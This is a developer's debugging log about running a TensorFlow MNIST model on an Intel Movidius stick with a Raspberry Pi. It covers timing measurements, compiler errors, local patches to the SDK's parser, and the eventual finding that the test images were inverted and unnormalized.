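When predict runs, dmesg sometimes shows Under-voltage detected!. When that happens, predict takes longer.
Running it several times in a row brings the system down, possibly because of insufficient power (from the 7th run onward in these results).


2. With Movidius
[0.62, 0.59, 0.60, 0.61, 0.61, 0.61, 0.61, 0.61, 0.61, 0.61] (10 runs, in seconds)
RAM usage: about 10%
CPU usage: about 5%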
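To put a number on the difference, here is a quick sketch that compares the two timing lists above. The first run without the Movidius is an outlier (10.55 s), so the median is probably the fairer summary; both are printed. The n/a runs are simply left out.

```python
from statistics import mean, median

# Seconds per predict call, copied from the measurements above.
# The runs marked n/a (the system went down) are left out.
without_ncs = [10.55, 2.15, 2.16, 2.10, 3.90, 2.12]
with_ncs = [0.62, 0.59, 0.60, 0.61, 0.61, 0.61, 0.61, 0.61, 0.61, 0.61]

median_speedup = median(without_ncs) / median(with_ncs)
mean_speedup = mean(without_ncs) / mean(with_ncs)

print(f"median: {median(without_ncs):.3f}s -> {median(with_ncs):.3f}s ({median_speedup:.1f}x)")
print(f"mean:   {mean(without_ncs):.3f}s -> {mean(with_ncs):.3f}s ({mean_speedup:.1f}x)")
```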

Compiling an arbitrary TensorFlow model (compiling your own model)

Training

To compile your own TensorFlow model for the Movidius, you need to edit the source code to suit the Movidius.
1. Give the input Placeholder a name
2. Save the trained network with tf.train.Saver()

This generates three files:

****.index
****.data-00000-of-00001
****.meta

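Converting to a compilable file

Next, reopen the generated trained model and output a model that can be compiled for the Movidius. The required changes are:
1. Give the output activation function a name
2. Remove every Placeholder other than the input
3. Remove dropout
4. Remove the training-data loading
5. Remove training-only code such as loss, training, and accuracy

With these changes in the code, open the saved model with restore and save it again.
This generates three files:

****_inference.index
****_inference.data-00000-of-00001
****_inference.meta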

Compiling

Use the mvNCCompile command to convert the saved ****_inference.meta file into a graph file.

mvNCCompile ****_inference.meta -s 12 -in input -on output -o ****_inference.graph

Here, input and output are replaced with the names of the input node and output node you specified.
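When compiling several models it is easy to mistype the node names, so a small wrapper can help. This is only a sketch: it assembles the same arguments as the command above (-s, -in, -on, -o) and nothing more, and the function name build_mvnccompile_command is made up for illustration.

```python
import shlex


def build_mvnccompile_command(meta_path, input_node, output_node, graph_path, shaves=12):
    """Build the mvNCCompile argument list in the form used in these notes."""
    return [
        "mvNCCompile", meta_path,
        "-s", str(shaves),
        "-in", input_node,
        "-on", output_node,
        "-o", graph_path,
    ]


command = build_mvnccompile_command(
    "mnist_inference.meta", "input", "output", "mnist_inference.graph")
print(" ".join(shlex.quote(arg) for arg in command))

# To actually run it (requires the NCSDK to be installed):
#   import subprocess
#   subprocess.run(command, check=True)
```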

Result

I tried deep_mnist.py from the TensorFlow examples.

tokunn@tokunn-VirtualBox 11:31:44 [~/Documents/MovidiusTensorflow/mnist] $ mvNCCompile mnist_inference.meta -s 12 -in input -on output -o mnist_inference.graph
mvNCCompile v02.00, Copyright @ Movidius Ltd 2016

/usr/local/lib/python3.5/dist-packages/tensorflow/python/framework/ops.py:766: DeprecationWarning: builtin type EagerTensor has no __module__ attribute
  EagerTensor = c_api.TFE_Py_InitEagerTensor(_EagerTensorBase)
/usr/local/lib/python3.5/dist-packages/tensorflow/python/util/tf_inspect.py:45: DeprecationWarning: inspect.getargspec() is deprecated, use inspect.signature() instead
  if d.decorator_argspec is not None), _inspect.getargspec(target))
Traceback (most recent call last):
  File "/usr/local/bin/mvNCCompile", line 118, in <module>
    create_graph(args.network, args.inputnode, args.outputnode, args.outfile, args.nshaves, args.inputsize, args.weights)
  File "/usr/local/bin/mvNCCompile", line 104, in create_graph
    net = parse_tensor(args, myriad_config)
  File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 293, in parse_tensor
    if have_first_input(strip_tensor_id(node.outputs[0].name)):
IndexError: list index out of range

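The file conversion works without problems, but at compile time mvNCCompile stops with an IndexError. The cause is that it indexes into a list without first checking that the list has any elements.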
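The failure mode is easy to reproduce in isolation. In the sketch below, FakeNode is a hypothetical stand-in for a graph operation (only its outputs list matters), and the node named init is an assumed example of an operation with no outputs. The unguarded loop fails the same way the parser does, while the guarded version skips the empty case.

```python
class FakeNode:
    """Hypothetical stand-in for a graph operation; only `outputs` matters here."""

    def __init__(self, name, outputs):
        self.name = name
        self.outputs = outputs


def first_output_name(node):
    """Return the first output name, or None when the node has no outputs."""
    if len(node.outputs) == 0:
        return None
    return node.outputs[0]


nodes = [FakeNode("input", ["input:0"]), FakeNode("init", [])]

try:
    unguarded = [node.outputs[0] for node in nodes]
except IndexError as error:
    print("unguarded access failed:", error)

guarded = [first_output_name(node) for node in nodes]
print(guarded)
```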

Rewriting the library

I work around this by editing /usr/local/bin/ncsdk/Controllers/TensorFlowParser.py. Whether this is a legitimate thing to do is unclear.

<                 if have_first_input(strip_tensor_id(node.outputs[0].name)):
---
>                 # ******* EDIT ******
>                 print(len(node.outputs))
>                 if len(node.outputs) and have_first_input(strip_tensor_id(node.outputs[0].name)):

With this change mvNCCompile runs through and the graph file is generated.

tokunn@tokunn-VirtualBox 11:36:34 [~/Documents/MovidiusTensorflow/mnist] $ mvNCCompile mnist_inference.meta -s 12 -in input -on output -o mnist_inference.graph     
mvNCCompile v02.00, Copyright @ Movidius Ltd 2016

/usr/local/lib/python3.5/dist-packages/tensorflow/python/framework/ops.py:766: DeprecationWarning: builtin type EagerTensor has no __module__ attribute
  EagerTensor = c_api.TFE_Py_InitEagerTensor(_EagerTensorBase)
/usr/local/lib/python3.5/dist-packages/tensorflow/python/util/tf_inspect.py:45: DeprecationWarning: inspect.getargspec() is deprecated, use inspect.signature() instead
  if d.decorator_argspec is not None), _inspect.getargspec(target))
1
1
1
1
0
1
/usr/local/bin/ncsdk/Controllers/FileIO.py:52: UserWarning: You are using a large type. Consider reducing your data sizes for best performance
  "Consider reducing your data sizes for best performance\033[0m")

Checking operation on the Movidius (v1)

Now to actually run it. Unless otherwise noted, the v1 API is used from here on.

pi@raspberrypi:~/week2/workspace $ python3 prediction_byMovidius4mvncV1.py
Start prediting ...
2 2 8 2 2 2 2 2 2 2 2 2 8 2 2 2 2 2 2 0 2 2 2 2 2 2 8 8 2 2 0 2 2 2 2 2 2 2 2 2 2 0 2 2 2 2 2 2 2 2 2 0 8 2 2 2 2 2 2 2 0 2 2 2 2 2 2 8 8 0 2 0 2 2 2 2 2 8 2 0 2 2 2 2 2 2 2 2 0 0 2 2 8 2 2 2 2 2 2 0 8 2 2 2 2 2 2 2 2 2 2 2 2 0 2 2 8 2 2 2 2 2 0 2 2 2 2 8 2 2 2 2 2 2 2 2 2 2 2 0 2 2 2 2 8 2 2 2 0 2 2 2 8 8 2 2 2 2 2 2 2 2 2 2 2 2 8 2 2 2 8 2 2 2 2 8 2 2 2 2 2 2 2 8 2 0 2 2 2 0 2 2 8 2 2 2 0 2 0 8 2 2 2 2 2 2 2 8 2 2 2 8 2 8 2 2 2 2 2 2 8 2 2 2 8 2 2 8 8 2 2 2 0 2 2 2 0 0 2 2 2 2 2 8 2 0 2 2 8 2 2 8 2 2 2 2 2 0 2 2 8 2 2 2 2 2 2 0 8 0 2 2 0 2 0 8 0 2 2 2 2 2 2 0 8 2 2 0 2 2 2 2 2 0 2 2 2 2 2 2 2 0 2 0 2 2 2 8 2 2 2 2 2 2 2 0 2 2 0 2 2 8 2 2 8 2 2 0 2 0 2 0 2 2 2 0 2 0 2 2 8 2 2 2 0 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 8 2 2 2 8 2 2 2 2 0 2 2 2 8 2 2 0 2 2 2 2 2 0 2 2 2 2 2 2 0 8 2 2 2 8 2 0 2 2 2 2 2 2 2 0 2 2 2 2 2 2 2 2 2 2 8 2 2 2 2 8 2 2 2 2 2 2 0 0 2 2 2 2 2 0 8 2 2 2 2 2 2 2 2 2 2 2 8 2 2 2 2 8 2 8 2 2 0 2 2 2 2 2 2 2 0 2 2 2 2 0 2 2 2 2 8 2 8 2 2 2 2 2 2 2 2 8 2 2 2 2 8 2 2 2 2 2 2 2
Time : 4.403196096420288 (500 images)

The output is wrong.
I check with 9 images, the digits 1 through 9.

pi@raspberrypi:~/week2/workspace $ vim prediction_byMovidius4mvncV1.py
pi@raspberrypi:~/week2/workspace $ python3 prediction_byMovidius4mvncV1.py
../../JPEGImages/pickup/00628.jpg
../../JPEGImages/pickup/00042.jpg
../../JPEGImages/pickup/00025.jpg
../../JPEGImages/pickup/00652.jpg
../../JPEGImages/pickup/00013.jpg
../../JPEGImages/pickup/00520.jpg
../../JPEGImages/pickup/00663.jpg
../../JPEGImages/pickup/00683.jpg
../../JPEGImages/pickup/00433.jpg
Start prediting ...
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]

Time : 0.11402153968811035 (9 images)

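For some reason 4 and 7 are recognized as "8" with 100% confidence, and everything else as "2" with 100% confidence. I try feeding the images in reverse order.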

pi@raspberrypi:~/week2/workspace $ vim prediction_byMovidius4mvncV1.py
pi@raspberrypi:~/week2/workspace $ python3 prediction_byMovidius4mvncV1.py
../../JPEGImages/pickup/00433.jpg
../../JPEGImages/pickup/00683.jpg
../../JPEGImages/pickup/00663.jpg
../../JPEGImages/pickup/00520.jpg
../../JPEGImages/pickup/00013.jpg
../../JPEGImages/pickup/00652.jpg
../../JPEGImages/pickup/00025.jpg
../../JPEGImages/pickup/00042.jpg
../../JPEGImages/pickup/00628.jpg
Start prediting ...
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]

Time : 0.11403870582580566 (9 images)

As before, 4 and 7 are recognized as "8" with 100% confidence, and everything else as "2" with 100%.

Starting over from scratch

Training

I run deepmnist.py in jupyter-notebook.

saving graph to: /tmp/tmpc_vjn3sg
step 0, training accuracy 0.08
step 10, training accuracy 0.4
step 20, training accuracy 0.46
(omitted)
step 470, training accuracy 0.96
step 480, training accuracy 0.92
step 490, training accuracy 0.96
test accuracy 0.939

The test accuracy is 0.939, so training worked correctly.
I confirm that the output files were saved correctly.

tokunn@tokunn-VirtualBox 13:49:04 [~/Documents/MovidiusTensorflow/mnist0911] $ ls -1
MNIST_data/
checkpoint
conv4movidius.ipynb
deepmnist.ipynb
mnist_model.data-00000-of-00001
mnist_model.index
mnist_model.meta
output/

Then I re-save it for the Movidius.

tokunn@tokunn-VirtualBox 13:51:43 [~/Documents/MovidiusTensorflow/mnist0911] $ ls -1
MNIST_data/
checkpoint
conv4movidius.ipynb
deepmnist.ipynb
mnist_inference.data-00000-of-00001
mnist_inference.index
mnist_inference.meta
mnist_model.data-00000-of-00001
mnist_model.index
mnist_model.meta
output/

Run the compile.

mvNCCompile mnist_inference.meta -s 12 -in input -on output -o mnist_inference.graph

Try predicting with the Movidius on the RPi.

pi@raspberrypi:~/week2/mnist0911 $ python3 prediction_byMovidius4mvncV1.py 
../../JPEGImages/pickup/00433.jpg
../../JPEGImages/pickup/00683.jpg
../../JPEGImages/pickup/00663.jpg
../../JPEGImages/pickup/00520.jpg
../../JPEGImages/pickup/00013.jpg
../../JPEGImages/pickup/00652.jpg
../../JPEGImages/pickup/00025.jpg
../../JPEGImages/pickup/00042.jpg
../../JPEGImages/pickup/00628.jpg
Start prediting ...
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 0. 1. 0. 0. 0. 0. 0. 0.]
[0. 0. 0. 1. 0. 0. 0. 0. 0. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]

Time : 0.1024773120880127 (10 images)

Still no change.

Trying a real machine instead of the RPi3

The Raspberry Pi might be at fault, so I try on an actual Linux machine (Ubuntu 16.04, hostname nanase).

tokunn@nanase 7:11:40 [~/Documents/week2/0911] $ python3 prediction_byMovidius4mvncV1.py
ERROR 1: libgrass_vector.7.4.0.so: cannot open shared object file: No such file or directory
ERROR 1: libgrass_vector.7.4.0.so: cannot open shared object file: No such file or directory
ERROR 1: libgrass_dgl.7.4.0.so: cannot open shared object file: No such file or directory
ERROR 1: libgrass_dgl.7.4.0.so: cannot open shared object file: No such file or directory
Image path : ./JPEGImages/*.jpg
Start prediting ...
[ 0.  0.  0.  0.  0.  1.  0.  0.  0.  0.]
[ 1.  0.  0.  0.  0.  0.  0.  0.  0.  0.]
[ 0.  0.  1.  0.  0.  0.  0.  0.  0.  0.]
[ 0.  0.  1.  0.  0.  0.  0.  0.  0.  0.]
[ 0.  0.  1.  0.  0.  0.  0.  0.  0.  0.]
[ 0.  0.  1.  0.  0.  0.  0.  0.  0.  0.]
[ 0.  0.  1.  0.  0.  0.  0.  0.  0.  0.]
[  3.35454941e-04   0.00000000e+00   0.00000000e+00   0.00000000e+00
   1.00000000e+00   0.00000000e+00   0.00000000e+00   0.00000000e+00
   0.00000000e+00   0.00000000e+00]
[ 0.  0.  0.  0.  0.  1.  0.  0.  0.  0.]
[ 0.  0.  1.  0.  0.  0.  0.  0.  0.  0.]

Time : 0.0796973705291748 (10 images)

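Something is still off.
So this is not happening because of the Raspberry Pi. Perhaps the problem is the graph file generated by mvNCCompile?

Checking whether the files saved by TensorFlow are correct

In jupyter-notebook, I restore from mnist_model and run predict.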

INFO:tensorflow:Restoring parameters from ./output/mnist_model
test accuracy 0.9477

It predicts without problems.

Checking whether the files given to mvNCCompile are correct

If this works correctly, the problem is mvNCCompile. If not, the files I fed it are bad.
In jupyter-notebook, I restore from mnist_inference and run predict.

INFO:tensorflow:Restoring parameters from ./output/mnist_inference
test accuracy 0.9477

This also predicts without problems. ---> the problem is somewhere around mvNCCompile

Checking the model with mvNCCheck

I use mvNCCheck to verify the model.

tokunn@nanase 8:20:05 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph
mvNCCheck v02.00, Copyright @ Movidius Ltd 2016

USB: Transferring Data...
USB: Myriad Execution Finished
USB: Myriad Connection Closing.
USB: Myriad Connection Closed.
Result:  (1, 1, 10)
1) 8 0.69141
2) 2 0.10852
3) 4 0.075806
4) 3 0.047607
5) 5 0.028824
Expected:  (1, 10)
1) 8 0.685481
2) 2 0.111384
3) 4 0.078136
4) 3 0.0483064
5) 5 0.0283811
------------------------------------------------------------
 Obtained values 
------------------------------------------------------------
 Obtained Min Pixel Accuracy: 0.8644439280033112% (max allowed=2%), Pass
 Obtained Average Pixel Accuracy: 0.19093991722911596% (max allowed=1%), Pass
 Obtained Percentage of wrong values: 0.0% (max allowed=0%), Pass
 Obtained Pixel-wise L2 error: 0.325355674229958% (max allowed=1%), Pass
 Obtained Global Sum Difference: 0.013088561594486237
------------------------------------------------------------

Result (the Movidius output) and Expected (the TensorFlow output) are almost identical, so it appears to be working correctly.
Does that mean the problem is the NCAPI used for inference?
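"Almost identical" can be checked by hand from the top-5 lists. The sketch below is my own quick comparison and not one of the metrics mvNCCheck reports: it confirms that the class ranking matches and finds the largest absolute difference between the paired scores.

```python
# (class, score) pairs copied from the mvNCCheck output above.
result = [(8, 0.69141), (2, 0.10852), (4, 0.075806), (3, 0.047607), (5, 0.028824)]
expected = [(8, 0.685481), (2, 0.111384), (4, 0.078136), (3, 0.0483064), (5, 0.0283811)]

# Same classes in the same order?
same_ranking = [cls for cls, _ in result] == [cls for cls, _ in expected]

# Largest gap between a Movidius score and the matching TensorFlow score.
max_abs_diff = max(abs(r - e) for (_, r), (_, e) in zip(result, expected))

print(same_ranking, max_abs_diff)
```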

Recognizing an image with mvNCCheck

Adding the -i option to mvNCCheck lets you specify your own image file as input.

tokunn@nanase 8:58:09 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/00013.jpg
mvNCCheck v02.00, Copyright @ Movidius Ltd 2016

Traceback (most recent call last):
  File "/usr/local/bin/mvNCCheck", line 152, in <module>
    quit_code = check_net(args.network, args.image, args.inputnode, args.outputnode, args.nshaves, args.inputsize, args.weights, args)
  File "/usr/local/bin/mvNCCheck", line 130, in check_net
    net = parse_tensor(args, myriad_config, file_gen=True)
  File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 266, in parse_tensor
    int(shape[3]),
IndexError: list index out of range

IndexError: list index out of range occurs again, in the library's /usr/local/bin/ncsdk/Controllers/TensorFlowParser.py.
~~I really wish TensorFlowParser would check the number of elements before accessing a list.~~
For now I enable debug=True on line 204 and add a line that prints shape.

204c204
<     # debug = True
---
>     debug = True
263a264
>             print("Input image shape", shape)

Running this gives:

tokunn@nanase 9:25:28 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/00013.jpg
mvNCCheck v02.00, Copyright @ Movidius Ltd 2016

Input image shape [1, 784]
Traceback (most recent call last):
  File "/usr/local/bin/mvNCCheck", line 152, in <module>
    quit_code = check_net(args.network, args.image, args.inputnode, args.outputnode, args.nshaves, args.inputsize, args.weights, args)
  File "/usr/local/bin/mvNCCheck", line 130, in check_net
    net = parse_tensor(args, myriad_config, file_gen=True)
  File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 267, in parse_tensor
    int(shape[3]),
IndexError: list index out of range

From this result, the input shape turns out to be [1, 784].
Running without the -i [image] option gives:

tokunn@nanase 9:26:30 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph                                 
mvNCCheck v02.00, Copyright @ Movidius Ltd 2016

Input image shape [1, 784]
        0 Const Const
           OUT: Const:0
/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py line no.290
        1 VariableV2 Variable
           OUT: Variable:0
(omitted)
BiasAdd
        75 Softmax output
           IN: fc2/add:0
           OUT: output:0
Softmax
(omitted)
Result:  (1, 1, 10)
1) 8 0.32178
2) 4 0.22034
3) 2 0.14233
4) 0 0.10773
5) 3 0.1059
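(omitted)

Here it runs correctly.
The input shape is [1, 784], the same as when the error occurred.
~~Wait, why is this CNN taking 1-D input (2-D as [1,784])?~~ ~~Shouldn't it be [1,28,28]?~~
-> It takes the input first and then reshapes it to 28x28.
I want to feed 2-D input ([1, 784]), but TensorFlowParser apparently is not satisfied with anything less than 4 dimensions.
But then why does nothing go wrong when it generates random input internally?
For now, I look for the definition of parse_img(), the function in question.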

tokunn@nanase 9:55:12 [/opt/movidius/NCSDK/ncsdk-x86_64/tk/Models] $ find / -type f 2>/dev/null | grep .py | xargs grep parse_img 2>/dev/null
/usr/local/bin/ncsdk/Controllers/MiscIO.py:def parse_img(path, new_size, raw_scale=1, mean=None, channel_swap=None):
/opt/movidius/NCSDK/ncsdk-armv7l/tk/Controllers/MiscIO.py:def parse_img(path, new_size, raw_scale=1, mean=None, channel_swap=None):
/opt/movidius/NCSDK/ncsdk-x86_64/tk/Controllers/MiscIO.py:def parse_img(path, new_size, raw_scale=1, mean=None, channel_swap=None):

It is apparently in /usr/local/bin/ncsdk/Controllers/MiscIO.py.

# Definition
227 def parse_img(path, new_size, raw_scale=1, mean=None, channel_swap=None):
228     """
229     Parse an image with the Python Imaging Libary and convert to 4D numpy array
234     """

There it is.
For reference, the call site is:

/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py

# Call site
266:  input_data = parse_img(image,
267-                         [int(shape[0]),
268-                          int(shape[3]),
269-                          int(shape[1]),
270-                          int(shape[2])],
271-                         raw_scale=arguments.raw_scale,
272-                         mean=arguments.mean,
273-                         channel_swap=arguments.channel_swap)

That is the call.
To find out what arguments it needs, I trace through parse_img() in /usr/local/bin/ncsdk/Controllers/MiscIO.py.

248     if path.split(".")[-1].lower() in ["png", "jpeg", "jpg", "bmp", "gif"]:
250         greyscale = True if new_size[2] == 1 else False

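Apparently new_size[2] (the third element of the list) is used to check the color channels.
So int(shape[1]) would have to be 1 in this case.
The first argument, path (image on the calling side), is the path to the image file.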

279     if (len(data.shape) == 2):
280         # Add axis for greyscale images (size 1)
281         data = data[:, :, np.newaxis]
282 
283     data = skimage.transform.resize(data, new_size[2:])
284     data = np.transpose(data, (2, 0, 1))
285     data = np.reshape(data, (1, data.shape[0], data.shape[1], data.shape[2]))
286 
287     data *= raw_scale

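First, a greyscale image has shape (x, y) only, so one axis is added to make it 3-D.
The shape is now (x, y, number of color channels).

Next, new_size[2] and new_size[3] are used as the resize target.
On the calling side these are int(shape[1]) and int(shape[2]), but wasn't int(shape[1]) supposed to indicate greyscale or not?
These are the only two places where new_size is used.
~~What is going on here~~

Then the axes are swapped so that (x, y, number of color channels) becomes (number of color channels, x, y).

For comparison, in the random-value case, which works correctly, input_data (inside TensorFlowParser) is set as follows: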

259  input_data = np.random.uniform(0, 1, shape)

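This means input_data should end up with the original shape, (1, 784).

From this information I make a guess at the arguments.
First, everything other than new_size can stay as it is.
Next, for the shape to pass as new_size: an image batch is normally laid out as (count, x, y, number of color channels).
The calling side rearranges this into [count, number of color channels, x, y].
So the input becomes [1, 1, shape[0], shape[1]].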
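The reordering can be written out as a small function to make the guess concrete. This is a sketch of the reasoning above, not the SDK's code: the 4-D branch mirrors the index order in the original call, the 2-D branch is the guess made here, and the name parse_img_size is made up.

```python
def parse_img_size(shape):
    """Build the [count, channels, x, y] list passed as new_size.

    4-D shapes are read as (count, x, y, channels), as in the original call.
    2-D shapes such as [1, 784] follow the guess made in these notes:
    [1, 1, shape[0], shape[1]].
    """
    if len(shape) == 4:
        return [int(shape[0]), int(shape[3]), int(shape[1]), int(shape[2])]
    if len(shape) == 2:
        return [1, 1, int(shape[0]), int(shape[1])]
    raise ValueError("unsupported input shape: %r" % (shape,))


print(parse_img_size([1, 160, 160, 3]))  # image-like input
print(parse_img_size([1, 784]))          # flattened MNIST input
```

The original call only has the 4-D branch, which is why a [1, 784] input fails at shape[3].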

/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py

268,271c268,271
<                                    [int(shape[0]),
<                                     int(shape[3]),
<                                     int(shape[1]),
<                                     int(shape[2])],
---
>                                    [int(1),
>                                     int(1),
>                                     int(shape[0]),
>                                     int(shape[1])],

However, with only this change, the following line is a problem:

250         greyscale = True if new_size[2] == 1 else False

This line decides greyscale by looking at the x value.
So I change new_size[2] to new_size[1]. A typo in the SDK, perhaps?

/usr/local/bin/ncsdk/Controllers/MiscIO.py

250c250
<         greyscale = True if new_size[2] == 1 else False
---
>         greyscale = True if new_size[1] == 1 else False
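The effect of the index change is easiest to see on a concrete size list. The sketch assumes new_size is laid out as [count, channels, x, y], which is how it is read in these notes; the 28x28 example and the helper is_greyscale are hypothetical.

```python
def is_greyscale(new_size, channel_index):
    """Treat the image as greyscale when the chosen entry of new_size is 1."""
    return new_size[channel_index] == 1


mnist_like = [1, 1, 28, 28]  # hypothetical [count, channels, x, y]

print(is_greyscale(mnist_like, 2))  # index 2 looks at x (28), so greyscale is missed
print(is_greyscale(mnist_like, 1))  # index 1 looks at the channel count
```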

Applying this patch and running gives:

tokunn@nanase 11:16:22 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/00013.jpg
mvNCCheck v02.00, Copyright @ Movidius Ltd 2016

Input image shape [1, 784]
image path ../JPEGImages/pickup/00013.jpg
/usr/local/lib/python3.6/dist-packages/skimage/transform/_warps.py:84: UserWarning: The default mode, 'constant', will be changed to 'reflect' in skimage 0.15.
  warn("The default mode, 'constant', will be changed to 'reflect' in "
Traceback (most recent call last):
  File "/usr/local/bin/mvNCCheck", line 152, in <module>
    quit_code = check_net(args.network, args.image, args.inputnode, args.outputnode, args.nshaves, args.inputsize, args.weights, args)
  File "/usr/local/bin/mvNCCheck", line 130, in check_net
    net = parse_tensor(args, myriad_config, file_gen=True)
  File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 274, in parse_tensor
    channel_swap=arguments.channel_swap)
  File "/usr/local/bin/ncsdk/Controllers/MiscIO.py", line 290, in parse_img
    data[0] = data[0][np.argsort(channel_swap), :, :]
IndexError: index 2 is out of bounds for axis 0 with size 1

A new error appears.
So, for now, I apply another patch.

/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py

272,274c272,274
<                                    raw_scale=arguments.raw_scale,
<                                    mean=arguments.mean,
<                                    channel_swap=arguments.channel_swap)
---
>                                    raw_scale=1,
>                                    mean=None,
>                                    channel_swap=None)

Running with this gives:

tokunn@nanase 11:41:03 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/00013.jpg
mvNCCheck v02.00, Copyright @ Movidius Ltd 2016

input_data shape (1, 1, 1, 784)
Traceback (most recent call last):
  File "/usr/local/bin/mvNCCheck", line 152, in <module>
    quit_code = check_net(args.network, args.image, args.inputnode, args.outputnode, args.nshaves, args.inputsize, args.weights, args)
  File "/usr/local/bin/mvNCCheck", line 130, in check_net
    net = parse_tensor(args, myriad_config, file_gen=True)
  File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 281, in parse_tensor
    res = outputTensor.eval(feed_dict={inputnode + ':0' : input_data})
  File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/framework/ops.py", line 570, in eval
    return _eval_using_default_session(self, feed_dict, self.graph, session)
  File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/framework/ops.py", line 4455, in _eval_using_default_session
    return session.run(tensors, feed_dict)
  File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/client/session.py", line 889, in run
    run_metadata_ptr)
  File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/client/session.py", line 1096, in _run
    % (np_val.shape, subfeed_t.name, str(subfeed_t.get_shape())))
ValueError: Cannot feed value of shape (1, 1, 784, 1) for Tensor 'input:0', which has shape '(1, 784)'

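Yet another error.
There is no end to this.
Is there any point in doing this?
Do I even need to give mvNCCheck an image?
Shouldn't I be tracing the Python API instead?
I concluded the graph was correct from mvNCCheck's random-input run, but if the generated graph were wrong in the first place, wouldn't the TensorFlow side produce strange results too?

Day 2

After all, even when I make it 4-D, the model's input is 2-D, so it cannot be fed in.
So I apply an even cruder patch. With this, no other images can be fed in and no other networks are supported.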

/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py

204c204
<     debug = True
---
>     # debug = True
277a278
>             input_data = input_data.transpose([0, 1, 3, 2])[0][0]
279a281
>                 #print(input_data)
297d298
<                 print("/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py line no.290")

Try running it.

tokunn@nanase 23:49:44 [~/Documents/week2/0912/output] $ for i in $(ls ../JPEGImages/pickup/); do echo $i; mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/$i 2>/dev/null; done
1.jpg

Result:  (1, 1, 10)
1) 2 0.28613
Expected:  (1, 10)
1) 2 0.281931
------------------------------------------------------------
2.jpg

Result:  (1, 1, 10)
1) 2 0.81348
Expected:  (1, 10)
1) 2 0.81391
------------------------------------------------------------
3.jpg

Result:  (1, 1, 10)
1) 2 0.87158
Expected:  (1, 10)
1) 2 0.870968
------------------------------------------------------------
4.jpg

Result:  (1, 1, 10)
1) 3 0.39771
Expected:  (1, 10)
1) 3 0.40986
------------------------------------------------------------
5.jpg

Result:  (1, 1, 10)
1) 2 0.70898
Expected:  (1, 10)
1) 2 0.712083
------------------------------------------------------------
6.jpg

Result:  (1, 1, 10)
1) 5 0.77686
Expected:  (1, 10)
1) 5 0.773194
------------------------------------------------------------
7.jpg

Result:  (1, 1, 10)
1) 5 0.49268
Expected:  (1, 10)
1) 5 0.499106
------------------------------------------------------------
8.jpg

Result:  (1, 1, 10)
1) 2 0.95605
Expected:  (1, 10)
1) 2 0.955554
------------------------------------------------------------
9.jpg

Result:  (1, 1, 10)
1) 2 0.50293
Expected:  (1, 10)
1) 2 0.494139
------------------------------------------------------------

As before, most digits are classified as 2.
However, when run through mvNCCheck the probability is not 100%.

The same result comes back whether I call it from the Python API or from mvNCCheck.
That means the converted graph file is what is wrong.

Either the file passed to mvNCCompile or mvNCCompile itself is at fault.

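Trying the deep_mnist sample with the code on GitHub

There was a deep_mnist sample on GitHub. https://github.com/ashwinvijayakumar/ncappzoo/tree/mnist/tensorflow/mnist

It works.
It still works after reverting the mvNCCompile patch.
It also works with my own graph and JPEGs.
Huh.
Does this mean I was simply not using the API correctly? (Of course, mvNCCheck -i still fails with IndexError.)
Still, Intel's sample was definitely wrong.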

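Cause

I trained on white digits on a black background, but ran inference on images with black digits on a white background
I forgot to divide by 255 after loading the image
mvNCCheck's image-loading feature does not work

What I had taken for wrong output all along was in fact correct output.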
